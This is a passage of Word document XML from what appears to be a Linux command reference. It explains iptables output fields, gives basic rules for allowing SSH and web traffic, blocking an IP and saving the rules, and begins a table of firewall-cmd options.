    <w:p w14:paraId="16336D8D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chain INPUT (policy ACCEPT)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Rules for incoming packets, default policy is ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFE751E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Action to take (ACCEPT, DROP, REJECT, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DFD0E6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prot</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Protocol (all, tcp, udp, icmp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665DC897" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>opt</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Options field (usually empty, shown as --)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E53C2C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>source/destination</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Source and destination addresses (anywhere = 0.0.0.0/0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13422C5E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ctstate RELATED,ESTABLISHED</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Accept packets from existing connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CACD774" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp dpt:ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Accept TCP traffic on SSH port (22)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD27E05" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DROP all</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Drop any remaining packets not matched by previous rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F39497A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chain FORWARD (policy DROP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Rules for packet forwarding, default DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C4A7FB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chain OUTPUT (policy ACCEPT)</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Rules for outgoing packets, default ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D4026" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Empty chains</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: FORWARD and OUTPUT have no custom rules, using default policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C429DDD" w14:textId="1FCE9BE6" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Allow SSH connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AEF9A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udo iptables -A INPUT -p tcp --dport 22 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAB873B" w14:textId="6579E3C8" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:lastRenderedPageBreak/>
        <w:t>Block specific IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486FB1E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udo iptables -A INPUT -s 192.168.1.100 -j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0009ECF4" w14:textId="78B70C43" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Allow HTTP/HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D3F8E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udo iptables -A INPUT -p tcp --dport 80 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A015CF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udo iptables -A INPUT -p tcp --dport 443 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61592294" w14:textId="58867305" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Save rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DD2108" w14:textId="06995516"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udo iptables-save &gt; /etc/iptables/rules.v4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F490B8A" w14:textId="2FD7F83B" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>firewall-cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604CB2F4" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>firewall-cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> command manages firewalld, a dynamic firewall manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797A245C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD1E8F0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:t>Manage firewall zones, services, and rules dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E2216B" w14:textId="4F3AB733" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7628E4BA"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firewall-cmd [options]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DBB220" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options and Commands</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3449"/>
        <w:gridCol w:w="3394"/>
      </w:tblGrid>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="15D3F3E6" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C4D4786" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Option/Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BBDA79C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="16D4362B" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F408B6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tate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A31E2BC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Check firewall state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6BEA4FE5" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="662ECA5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get-default-zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C163B36" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Get default zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="30AD28F2" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1707F6C2"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et-default-zone=ZONE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27923FFA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set default zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4295790E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E089E8E"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get-zones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BB7BB34" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List all zones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6F84AE24" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B51ECA4"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get-active-zones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10F058A0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List active zones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="530E7EB9" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="501987E0"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list-all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E7E6C52" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List everything in current zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="4320B9D3" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E205FA3"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list-all-zones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B01E7A6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List everything in all zones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7CE13F2C" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5985AA7E"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zone=ZONE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77EA919D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Specify zone for operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7178F027" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6841870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permanent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34E5DDC0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Make changes permanent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="18D342E7" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47A20D7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eload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EEB6D77" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Reload firewall configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3DE015F6" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BBA5522"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untime-to-permanent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3660E28D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Make runtime config permanent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5FC5E758" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58B756EE"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get-services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C8EDD21" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List all available services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3E1B18A9" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46490930"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list-services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AF257B1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List enabled services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="514E1D15" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="308DF2DF"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dd-service=SERVICE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50AB28EE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Enable service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="088CCE87" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CBE9AA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emove-service=SERVICE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7740B5D6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Disable service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7899EE5C" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CDBC738"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list-ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36766F55" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>List enabled ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7EE9F8C3" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="445A417F"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dd-port=PORT/PROTOCOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="558F8B90" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Enable port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5C61C4BC" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70F94ECB"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emove-port=PORT/PROTOCOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2750A8A0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Disable port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7A1B6090" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
